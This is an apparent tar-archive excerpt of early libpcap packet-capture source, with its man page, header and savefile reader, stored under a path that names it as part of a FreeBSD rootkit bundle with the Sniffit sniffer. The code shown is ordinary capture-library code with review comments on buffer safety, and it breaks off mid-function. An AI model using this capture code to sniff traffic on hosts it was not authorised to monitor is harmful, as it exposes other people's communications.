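 * Returns 0 on success, -1 with p->errbuf set when the ioctl fails.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{
	register struct rawstats *rs;
	struct rawstats rawstats;

	rs = &rawstats;
	bzero((char *)rs, sizeof(*rs));
	if (ioctl(p->fd, SIOCRAWSTATS, (char *)rs) < 0) {
		sprintf(p->errbuf, "SIOCRAWSTATS: %s", pcap_strerror(errno));
		return (-1);
	}

	p->md.stat.ps_drop =
	    rs->rs_snoop.ss_ifdrops + rs->rs_snoop.ss_sbdrops +
	    rs->rs_drain.ds_ifdrops + rs->rs_drain.ds_sbdrops;

	*ps = p->md.stat;
	return (0);
}

/* XXX can't disable promiscuous */
/*
 * Open a snoop raw socket bound to `device' and start capturing.
 *
 * snaplen	capture length handed to SIOCSNOOPLEN
 * promisc	not used (see the XXX above)
 * to_ms	not used by this implementation
 * ebuf		caller's error buffer, written only on failure
 *
 * Returns a handle owned by the caller, or 0 on failure (socket closed,
 * buffer and handle freed).
 */
pcap_t *
pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf)
{
	pcap_t *p;
	struct sockaddr_raw sr;
	/*
	 * Start at -1: the first `goto bad' is taken before the socket
	 * exists, and the cleanup code tests fd.
	 */
	int fd = -1;
	int v;
	struct snoopfilter sf;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		strcpy(ebuf, "no swap");
		return (0);
	}
	bzero(p, sizeof(*p));
	p->fd = -1;
	p->bufsize = 4096;				/* XXX */
	p->buffer = (u_char *)malloc(p->bufsize);
	if (p->buffer == NULL) {
		strcpy(ebuf, "no swap");
		goto bad;
	}
	fd = p->fd = socket(PF_RAW, SOCK_RAW, RAWPROTO_SNOOP);
	if (fd < 0) {
		sprintf(ebuf, "snoop socket: %s", pcap_strerror(errno));
		goto bad;
	}
	sr.sr_family = AF_RAW;
	sr.sr_port = 0;
	/*
	 * NOTE(review): strncpy() does not terminate sr_ifname when
	 * `device' fills the field - confirm the kernel accepts that.
	 */
	(void)strncpy(sr.sr_ifname, device, sizeof(sr.sr_ifname));
	if (bind(fd, (struct sockaddr *)&sr, sizeof(sr))) {
		sprintf(ebuf, "snoop bind: %s", pcap_strerror(errno));
		goto bad;
	}
	bzero((char *)&sf, sizeof(sf));
	if (ioctl(fd, SIOCADDSNOOP, &sf) < 0) {
		sprintf(ebuf, "SIOCADDSNOOP: %s", pcap_strerror(errno));
		goto bad;
	}
	v = 64 * 1024;
	(void)setsockopt(fd, SOL_SOCKET, SO_RCVBUF, (char *)&v, sizeof(v));
	if (ioctl(fd, SIOCSNOOPLEN, &snaplen) < 0) {
		sprintf(ebuf, "SIOCSNOOPLEN: %s", pcap_strerror(errno));
		goto bad;
	}
	p->snapshot = snaplen;
	v = 1;
	if (ioctl(fd, SIOCSNOOPING, &v) < 0) {
		sprintf(ebuf, "SIOCSNOOPING: %s", pcap_strerror(errno));
		goto bad;
	}
	/*
	 * XXX hack - map device name to link layer type
	 */
	if (strncmp("et", device, 2) == 0 || strncmp("ec", device, 2) == 0) {
		p->linktype = DLT_EN10MB;
		hdrpad = RAW_HDRPAD(sizeof(struct ether_header));
	} else if (strncmp("ipg", device, 3) == 0 ||
		   strncmp("xpi", device, 3) == 0) {
		p->linktype = DLT_FDDI;
		hdrpad = 3;				/* XXX yeah? */
	} else {
		sprintf(ebuf, "snoop: unknown physical layer type");
		goto bad;
	}

	return (p);
 bad:
	if (fd >= 0)
		close(fd);
	if (p->buffer != NULL)
		free(p->buffer);
	free(p);
	return (0);
}

/*
 * Keep a copy of the filter program in the handle; pcap_read() applies it
 * in user space.  Always returns 0.
 */
int
pcap_setfilter(pcap_t *p, struct bpf_program *fp)
{

	p->fcode = *fp;
	return (0);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.3100400 764 764 17214 6226213211 15674 0ustar dfdf.\" Copyright (c) 1994 .\" The Regents of the University of California. All rights reserved.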
.\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that: (1) source code distributions .\" retain the above copyright notice and this paragraph in its entirety, (2) .\" distributions including binary code include the above copyright notice and .\" this paragraph in its entirety in the documentation or other materials .\" provided with the distribution, and (3) all advertising materials mentioning .\" features or use of this software display the following acknowledgement: .\" ``This product includes software developed by the University of California, .\" Lawrence Berkeley Laboratory and its contributors.'' Neither the name of .\" the University nor the names of its contributors may be used to endorse .\" or promote products derived from this software without specific prior .\" written permission. .\" THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED .\" WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF .\" MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
.\" .TH PCAP 3 "14 Jun 1994" .SH NAME pcap \- Packet Capture library .SH SYNOPSIS .nf .ft B #include .ft .LP .ft B pcap_t *pcap_open_live(char *device, int snaplen, .ti +8 int promisc, int to_ms, char *ebuf) pcap_t *pcap_open_offline(char *fname, char *ebuf) pcap_dumper_t *pcap_dump_open(pcap_t *p, char *fname) .ft .LP .ft B char errbuf[PCAP_ERRBUF_SIZE]; char *pcap_lookupdev(char *errbuf) int pcap_lookupnet(char *device, u_long *netp, .ti +8 u_long *maskp, char *errbuf) .ft .LP .ft B int pcap_dispatch(pcap_t *p, int cnt, .ti +8 pcap_handler callback, u_char *user) int pcap_loop(pcap_t *p, int cnt, .ti +8 pcap_handler callback, u_char *user) void pcap_dump(u_char *user, struct pcap_pkthdr *h, .ti +8 u_char *sp) .ft .LP .ft B int pcap_immediate(pcap_t *p) .ft .LP .ft B int pcap_compile(pcap_t *p, struct bpf_program *fp, .ti +8 char *str, int optimize, u_long netmask) int pcap_setfilter(pcap_t *p, struct bpf_program *fp) .ft .LP .ft B u_char *pcap_next(pcap_t *p, struct pcap_pkthdr *h) .ft .LP .ft B int pcap_datalink(pcap_t *p) int pcap_snapshot(pcap_t *p) int pcap_is_swapped(pcap_t *p) int pcap_major_version(pcap_t *p) int pcap_minor_version(pcap_t *p) int pcap_stats(pcap_t *p, struct pcap_stat *ps) FILE *pcap_file(pcap_t *p) int pcap_fileno(pcap_t *p) void pcap_perror(pcap_t *p, char *prefix) char *pcap_geterr(pcap_t *p) char *pcap_strerror(int error) .ft .LP .ft B void pcap_close(pcap_t *p) void pcap_dump_close(pcap_dumper_t *p) .ft .fi .SH DESCRIPTION The Packet Capture library provides a high level interface to packet capture systems. All packets on the network, even those destined for other hosts, are accessible through this mechanism. .PP .SH ROUTINES .B pcap_open_live() is used to obtain a packet capture descriptor to look at packets on the network. .I device is a string that specifies the network device to open. .I snaplen specifies the maximum number of bytes to capture. .I to_ms specifies the read timeout in milliseconds. 
.I ebuf is used to return error text and is only set when .B pcap_open_live() fails and returns .BR NULL . .PP .B pcap_open_offline() is called to open a ``savefile'' for reading. .I fname specifies the name of the file to open. The file has the same format as those used by .B tcpdump(1) and .BR tcpslice(1) . The name "-" is a synonym for .BR stdin . .I ebuf is used to return error text and is only set when .B pcap_open_offline() fails and returns .BR NULL . .PP .B pcap_dump_open() is called to open a ``savefile'' for writing. The name "-" is a synonym for .BR stdin . .B NULL is returned on failure. .I p is a .I pcap struct as returned by .B pcap_open_offline() or .BR pcap_open_live() . .I fname specifies the name of the file to open. If .B NULL is returned, .B pcap_geterr() can be used to get the error text. .PP .B pcap_lookupdev() returns a pointer to a network device suitable for use with .B pcap_open_live() and .BR pcap_lookupnet() . If there is an error, .B NULL is returned and .I errbuf is filled in with an appropriate error message. .PP .B pcap_lookupnet() is used to determine the network number and mask associated with the network device .BR device . Both .I netp and .I maskp are .I u_long pointers. A return of -1 indicates an error in which case .I errbuf is filled in with an appropriate error message. .PP .B pcap_dispatch() is used to collect and process packets. .I cnt specifies the maximum number of packets to process before returning. A .I cnt of -1 processes all the packets received in one buffer. A .I cnt of 0 processes all packets until an error occurs (or .B EOF is reached). .I callback specifies a routine to be called with three arguments: a .I u_char pointer which is passed in from .BR pcap_dispatch() , a pointer to the .I pcap_pkthdr struct (which precedes the actual network headers and data), and a length. The number of packets read is returned.
Zero is returned when .B EOF is reached in a ``savefile.'' A return of -1 indicates an error in which case .B pcap_perror() or .BR pcap_geterr() may be used to display the error text. .PP .B pcap_dump() outputs a packet to the ``savefile'' opened with .BR pcap_dump_open() . Note that its calling arguments are suitable for use with .BR pcap_dispatch() . .ft B (??? this guy is kind of weird.) .ft .PP .B pcap_immediate() sets ``immediate'' mode. If this isn't supported by the underlying packet capture, -1 is returned and the error text can be obtained with .B pcap_perror() or .BR pcap_geterr() . .PP .B pcap_compile() is used to compile the string .I str into a filter program. .I program is a pointer to a .I bpf_program struct and is filled in by .BR pcap_compile() . .I optimize controls whether optimization on the resulting code is performed. .I netmask specifies the netmask of the local net. .PP .B pcap_setfilter() is used to specify a filter program. .I fp is a pointer to an array of .I bpf_program struct, usually the result of a call to .BR pcap_compile() . .PP .B pcap_loop() is similar to .B pcap_dispatch() except it keeps reading packets until .I cnt packets are processed or an error occurs. A negative .I cnt causes .B pcap_loop() to loop forever (or at least until an error occurs). .PP .B pcap_next() returns a .I u_char pointer to the next packet. .PP .B pcap_datalink() returns the link layer type, e.g. .BR DLT_EN10MB . .PP .B pcap_snapshot() returns the snapshot length specified when .B pcap_open_live was called. .PP .B pcap_is_swapped() returns true if the current ``savefile'' uses a different byte order than the current system. .PP .B pcap_major_version() returns the major number of the version of the pcap used to write the savefile. .PP .B pcap_minor_version() returns the minor number of the version of the pcap used to write the savefile.
.PP .B pcap_file() returns the name of the ``savefile.'' .PP .B int pcap_stats() returns 0 and fills in a .B pcap_stat struct with packet statistics. If there is an error or the under lying packet capture doesn't support packet statistics, -1 is returned and the error text can be obtained with .B pcap_perror() or .BR pcap_geterr() . .PP .B pcap_fileno() returns the file descriptor number of the ``savefile.'' .PP .B pcap_perror() prints the text of the last pcap library error on .BR stderr , prefixed by .IR prefix . .PP .B pcap_geterr() returns the error text pertaining to the last pcap library error. .PP .B pcap_strerror() is provided in case .BR strerror (1) isn't available. .PP .B pcap_close() closes the files associated with .I p and deallocates resources. .PP .B pcap_dump_close() closes the ``savefile.'' .PP .SH SEE ALSO tcpdump(1), tcpslice(1) .SH BUGS .SH HISTORY fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.c100600 764 0 10045 6257600151 16271 0ustar dfroot/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. 
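* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */
#ifndef lint
static char rcsid[] = "@(#) $Header: pcap.c,v 1.12+ 94/06/12 14:32:23 leres Exp $ (LBL)";
#endif

#include #include #include "pcap-int.h"

/*
 * Process packets from a savefile (when one is open on the handle) or
 * from the live capture.  For a live capture pcap_read() is retried for
 * as long as it returns 0.
 *
 * Returns what pcap_offline_read() / pcap_read() return.
 */
int
pcap_dispatch(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	register int cc;

	if (p->sf.rfile != NULL)
		return (pcap_offline_read(p, cnt, callback, user));
	/* XXX keep reading until we get something (or an error occurs) */
	do {
		cc = pcap_read(p, cnt, callback, user);
	} while (cc == 0);
	return (cc);
}

/*
 * Call pcap_dispatch() repeatedly.  With cnt > 0 the loop ends with 0
 * once that many packets were handled; with cnt <= 0 it only ends when
 * pcap_dispatch() returns 0 or a negative value, which is passed back.
 */
int
pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	for (;;) {
		int n = pcap_dispatch(p, cnt, callback, user);
		if (n <= 0)
			return (n);
		if (cnt > 0) {
			cnt -= n;
			if (cnt <= 0)
				return (0);
		}
	}
}

/* Carries one packet out of the pcap_oneshot() callback. */
struct singleton {
	struct pcap_pkthdr *hdr;
	const u_char *pkt;
};

/*
 * Callback used by pcap_next(): copy the header into the caller's
 * pcap_pkthdr and remember the data pointer.
 */
static void
pcap_oneshot(u_char *userData, const struct pcap_pkthdr *h, const u_char *pkt)
{
	struct singleton *sp = (struct singleton *)userData;
	*sp->hdr = *h;
	sp->pkt = pkt;
}

/*
 * Fetch a single packet.  *h receives its header; the returned pointer
 * is the one handed to the callback (it points into the capture buffer,
 * not a copy).  Returns 0 when pcap_dispatch() delivers nothing or fails.
 */
const u_char *
pcap_next(pcap_t *p, struct pcap_pkthdr *h)
{
	struct singleton s;

	s.hdr = h;
	if (pcap_dispatch(p, 1, pcap_oneshot, (u_char*)&s) <= 0)
		return (0);
	return (s.pkt);
}

/* Return the link type stored in the handle. */
int
pcap_datalink(pcap_t *p)
{
	return (p->linktype);
}

/* Return the snapshot length stored in the handle. */
int
pcap_snapshot(pcap_t *p)
{
	return (p->snapshot);
}

/* Return the savefile's byte-swap flag. */
int
pcap_is_swapped(pcap_t *p)
{
	return (p->sf.swapped);
}

/* Return the major version recorded for the savefile. */
int
pcap_major_version(pcap_t *p)
{
	return (p->sf.version_major);
}

/* Return the minor version recorded for the savefile. */
int
pcap_minor_version(pcap_t *p)
{
	return (p->sf.version_minor);
}

/* Return the savefile's stdio stream (NULL when none is open). */
FILE *
pcap_file(pcap_t *p)
{
	return (p->sf.rfile);
}

/* Return the descriptor stored in the handle. */
int
pcap_fileno(pcap_t *p)
{
	return (p->fd);
}

/* Print "prefix: <last error text>" on stderr. */
void
pcap_perror(pcap_t *p, char *prefix)
{
	fprintf(stderr, "%s: %s\n", prefix, p->errbuf);
}

/* Return the handle's error buffer; the storage belongs to the handle. */
char *
pcap_geterr(pcap_t *p)
{
	return (p->errbuf);
}

/*
 * Not all systems have strerror().
 *
 * The sys_errlist lookup is commented out in this copy, so every error
 * number is rendered as "Unknown error: N".  The result lives in a static
 * buffer that the next call overwrites.
 */
char *
pcap_strerror(int errnum)
{
/*
	extern int sys_nerr;
	extern char *sys_errlist[];
*/
	/*
	 * Sized for the fixed text plus any int: three decimal digits per
	 * byte is an upper bound, plus one for the sign.  The former
	 * 20-byte buffer overflowed for values of five digits or more.
	 */
	static char ebuf[sizeof("Unknown error: ") + 3 * sizeof(int) + 1];
/*
	if ((unsigned int)errnum < sys_nerr)
		return (sys_errlist[errnum]);
*/
	(void)sprintf(ebuf, "Unknown error: %d", errnum);
	return(ebuf);
}

/*
 * Release everything the handle owns: the descriptor, then either the
 * savefile stream and its base buffer or the live capture buffer, and
 * finally the handle itself.  `p' must not be used afterwards.
 */
void
pcap_close(pcap_t *p)
{
	/*XXX*/
	if (p->fd >= 0)
		close(p->fd);
	if (p->sf.rfile != NULL) {
		fclose(p->sf.rfile);
		if (p->sf.base != NULL)
			free(p->sf.base);
	} else if (p->buffer != NULL)
		free(p->buffer);

	free(p);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.h100400 764 764 11373 6226213211 15761 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4.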
Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.15 94/06/14 20:03:34 leres Exp $ (LBL) */
#ifndef lib_pcap_h
#define lib_pcap_h

#include #include #include #include

/* Savefile format version written into pcap_file_header. */
#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

/*
 * Size callers give their error buffer (see errbuf[PCAP_ERRBUF_SIZE] in
 * pcap(3)).  The open routines fill that buffer with sprintf()/strcpy()
 * and take no length argument, so a smaller buffer is not safe to pass.
 */
#define PCAP_ERRBUF_SIZE 256

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
#if BPF_RELEASE - 0 < 199406
typedef	long bpf_int32;
typedef	u_long bpf_u_int32;
#endif

/* Opaque handles; the structures are defined outside this header. */
typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are longs so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
	bpf_u_int32 magic;
	u_short version_major;
	u_short version_minor;
	bpf_int32 thiszone;	/* gmt to local correction */
	bpf_u_int32 sigfigs;	/* accuracy of timestamps */
	bpf_u_int32 snaplen;	/* max length saved portion of each pkt */
	bpf_u_int32 linktype;	/* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
	struct timeval ts;	/* time stamp */
	bpf_u_int32 caplen;	/* length of portion present */
	bpf_u_int32 len;	/* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
	u_int ps_recv;		/* number of packets received */
	u_int ps_drop;		/* number of packets dropped */
	u_int ps_ifdrop;	/* drops by interface XXX not yet supported */
};

/*
 * Per-packet callback: the user pointer given to pcap_dispatch() or
 * pcap_loop(), the packet header, and the packet data.
 */
typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
			     const u_char *);

char	*pcap_lookupdev(char *);
int	pcap_lookupnet(char *, u_long *, u_long *, char *);
pcap_t	*pcap_open_live(char *, int, int, int, char *);
pcap_t	*pcap_open_offline(char *, char *);
void	pcap_close(pcap_t *);
int	pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int	pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
	pcap_next(pcap_t *, struct pcap_pkthdr *);
int	pcap_stats(pcap_t *, struct pcap_stat *);
int	pcap_setfilter(pcap_t *, struct bpf_program *);
void	pcap_perror(pcap_t *, char *);
char	*pcap_strerror(int);
char	*pcap_geterr(pcap_t *);
int	pcap_compile(pcap_t *, struct bpf_program *, char *, int, u_long);
/* XXX */
int	pcap_freecode(pcap_t *, struct bpf_program *);
int	pcap_datalink(pcap_t *);
int	pcap_snapshot(pcap_t *);
int	pcap_is_swapped(pcap_t *);
int	pcap_major_version(pcap_t *);
int	pcap_minor_version(pcap_t *);

/* XXX */
FILE	*pcap_file(pcap_t *);
int	pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, char *);
void	pcap_dump_close(pcap_dumper_t *);
void	pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int	bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char	*bpf_image(struct bpf_insn *, int);
#endif
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/savefile.c100600 764 764 20235 6226213211 16626 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: savefile.c,v 1.16 94/06/20 19:07:56 leres Exp $ (LBL)"; #endif /* * savefile.c - supports offline use of tcpdump * Extraction/creation by Jeffrey Mogul, DECWRL * Modified by Steve McCanne, LBL. * * Used to save the received packet headers, after filtering, to * a file, and then read them later. * The first record in the file contains saved values for the machine * dependent values so we can print the dump file on any architecture.
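*/

/*
 * NOTE(review): the header names on the bare #include lines below were lost
 * when this listing was extracted; they are kept exactly as found.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include "pcap-int.h"

#define TCPDUMP_MAGIC 0xa1b2c3d4

/*
 * We use the "receiver-makes-right" approach to byte order,
 * because time is at a premium when we are writing the file.
 * In other words, the pcap_file_header and pcap_pkthdr,
 * records are written in host byte order.
 * Note that the packets are always written in network byte order.
 *
 * ntoh[ls] aren't sufficient because we might need to swap on a big-endian
 * machine (if the file was written in little-end order).
 */
#define	SWAPLONG(y) \
((((y)&0xff)<<24) | (((y)&0xff00)<<8) | (((y)&0xff0000)>>8) | (((y)>>24)&0xff))
#define	SWAPSHORT(y) \
	( (((y)&0xff)<<8) | (((y)&0xff00)>>8) )

#define SFERR_TRUNC		1
#define SFERR_BADVERSION	2
#define SFERR_BADF		3
#define SFERR_EOF		4 /* not really an error, just a status */

/*
 * Upper bound accepted for the snaplen in the file header and for the
 * caplen in each per-packet header.  Both values come straight from the
 * savefile, i.e. from whoever produced it, and both are used as allocation
 * and read sizes, so they are range-checked before use.  262144 is the
 * bound later libpcap releases apply (MAXIMUM_SNAPLEN).
 */
#define SF_MAX_SNAPLEN		262144

/*
 * Write the savefile header record to fp in host byte order.
 * Returns 0 on success and -1 if the record could not be written.
 */
static int
sf_write_header(FILE *fp, int linktype, int thiszone, int snaplen)
{
	struct pcap_file_header hdr;

	hdr.magic = TCPDUMP_MAGIC;
	hdr.version_major = PCAP_VERSION_MAJOR;
	hdr.version_minor = PCAP_VERSION_MINOR;

	hdr.thiszone = thiszone;
	hdr.snaplen = snaplen;
	hdr.sigfigs = 0;
	hdr.linktype = linktype;

	if (fwrite((char *)&hdr, sizeof(hdr), 1, fp) != 1)
		return (-1);

	return (0);
}

/*
 * Byte-swap every multi-byte field of a file header except the magic
 * number, which the caller has already examined to detect the swap.
 */
static void
swap_hdr(struct pcap_file_header *hp)
{
	hp->version_major = SWAPSHORT(hp->version_major);
	hp->version_minor = SWAPSHORT(hp->version_minor);
	hp->thiszone = SWAPLONG(hp->thiszone);
	hp->sigfigs = SWAPLONG(hp->sigfigs);
	hp->snaplen = SWAPLONG(hp->snaplen);
	hp->linktype = SWAPLONG(hp->linktype);
}

/*
 * Open the savefile 'fname' ("-" means stdin) for reading and return a
 * handle for it, or NULL with a message in errbuf.
 *
 * The file is untrusted input: the header is validated (magic, version,
 * snaplen range) before any of its values is used as a size.  errbuf is
 * presumably PCAP_ERRBUF_SIZE bytes, as callers of this API are expected
 * to provide; the messages written here are bounded to fit that size.
 *
 * On every failure path the FILE opened here is closed again (stdin is
 * left alone) and the partially built handle is freed.
 */
pcap_t *
pcap_open_offline(char *fname, char *errbuf)
{
	register pcap_t *p;
	register FILE *fp = NULL;
	struct pcap_file_header hdr;
	int linklen;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		strcpy(errbuf, "out of swap");
		return (NULL);
	}

#ifdef notdef
	bzero(p, sizeof(*p));
#else
	memset(p, 0, sizeof(*p));
#endif
	/*
	 * Set this field so we don't close stdin in pcap_close!
	 */
	p->fd = -1;

	if (fname[0] == '-' && fname[1] == '\0')
		fp = stdin;
	else {
		fp = fopen(fname, "r");
		if (fp == NULL) {
			/* Precision limits keep a long path from overrunning errbuf. */
			sprintf(errbuf, "%.150s: %.100s", fname,
			    pcap_strerror(errno));
			goto bad;
		}
	}
	if (fread((char *)&hdr, sizeof(hdr), 1, fp) != 1) {
		sprintf(errbuf, "fread: %.100s", pcap_strerror(errno));
		goto bad;
	}
	if (hdr.magic != TCPDUMP_MAGIC) {
		if (SWAPLONG(hdr.magic) != TCPDUMP_MAGIC) {
			sprintf(errbuf, "bad dump file format");
			goto bad;
		}
		p->sf.swapped = 1;
		swap_hdr(&hdr);
	}
	if (hdr.version_major < PCAP_VERSION_MAJOR) {
		sprintf(errbuf, "archaic file format");
		goto bad;
	}
	/*
	 * snaplen sizes the packet buffer below.  Without this check a huge
	 * value wraps when stored in an int and yields an undersized buffer
	 * that later packet reads would overrun.
	 */
	if (hdr.snaplen > SF_MAX_SNAPLEN) {
		sprintf(errbuf, "bogus savefile header");
		goto bad;
	}
	p->tzoff = hdr.thiszone;
	p->snapshot = hdr.snaplen;
	p->linktype = hdr.linktype;
	p->bufsize = hdr.snaplen;

	/* Align link header as required for proper data alignment */
	linklen = 14;		/* XXX */
	p->sf.base = (u_char *)malloc(p->bufsize + BPF_ALIGNMENT);
	if (p->sf.base == NULL) {
		strcpy(errbuf, "out of swap");
		goto bad;
	}
	p->buffer = p->sf.base + BPF_ALIGNMENT - (linklen % BPF_ALIGNMENT);
	p->sf.rfile = fp;
	p->sf.version_major = hdr.version_major;
	p->sf.version_minor = hdr.version_minor;

	return (p);
 bad:
	if (fp != NULL && fp != stdin)
		(void)fclose(fp);
	free(p);
	return (NULL);
}

/*
 * Read the next packet from the savefile.  The per-packet header is
 * returned in hdr and at most buflen bytes of packet data in buf.
 *
 * Returns 0 on success, 1 when no further packet header could be read
 * (normally end of file; pcap_offline_read() treats 1 as EOF) and -1 with
 * a message in p->errbuf on a truncated or implausible record.
 *
 * caplen is read from the file and therefore attacker-controlled; it is
 * range-checked before it is used as a read or allocation size, and it is
 * clamped to buflen when the record is longer than the caller's buffer so
 * that consumers never look past the bytes actually stored in buf.
 */
static int
sf_next_packet(pcap_t *p, struct pcap_pkthdr *hdr, u_char *buf, int buflen)
{
	FILE *fp = p->sf.rfile;

	/* read the stamp */
	if (fread((char *)hdr, sizeof(struct pcap_pkthdr), 1, fp) != 1) {
		/* probably an EOF, though could be a truncated packet */
		return (1);
	}

	if (p->sf.swapped) {
		/* these were written in opposite byte order */
		hdr->caplen = SWAPLONG(hdr->caplen);
		hdr->len = SWAPLONG(hdr->len);
		hdr->ts.tv_sec = SWAPLONG(hdr->ts.tv_sec);
		hdr->ts.tv_usec = SWAPLONG(hdr->ts.tv_usec);
	}
	/*
	 * We interchanged the caplen and len fields at version 2.3,
	 * in order to match the bpf header layout.  But unfortunately
	 * some files were written with version 2.3 in their headers
	 * but without the interchanged fields.
	 */
	if (p->sf.version_minor < 3 ||
	    (p->sf.version_minor == 3 && hdr->caplen > hdr->len)) {
		bpf_u_int32 t = hdr->caplen;
		hdr->caplen = hdr->len;
		hdr->len = t;
	}

	/* Refuse sizes that cannot be genuine before using them anywhere. */
	if (buflen < 0 || hdr->caplen > SF_MAX_SNAPLEN) {
		sprintf(p->errbuf, "bogus savefile header");
		return (-1);
	}

	if (hdr->caplen > (bpf_u_int32)buflen) {
		/*
		 * This can happen due to Solaris 2.3 systems tripping
		 * over the BUFMOD problem and not setting the snapshot
		 * correctly in the savefile header.  If the caplen isn't
		 * grossly wrong, try to salvage.
		 */
		static u_char *tp = NULL;
		static int tsize = 0;

		if (tsize < (int)hdr->caplen) {
			tsize = (((int)hdr->caplen + 1023) / 1024) * 1024;
			if (tp != NULL)
				free((u_char *)tp);
			tp = (u_char *)malloc(tsize);
			if (tp == NULL) {
				/* Keep size and pointer in step for the next call. */
				tsize = 0;
				sprintf(p->errbuf, "BUFMOD hack malloc");
				return (-1);
			}
		}
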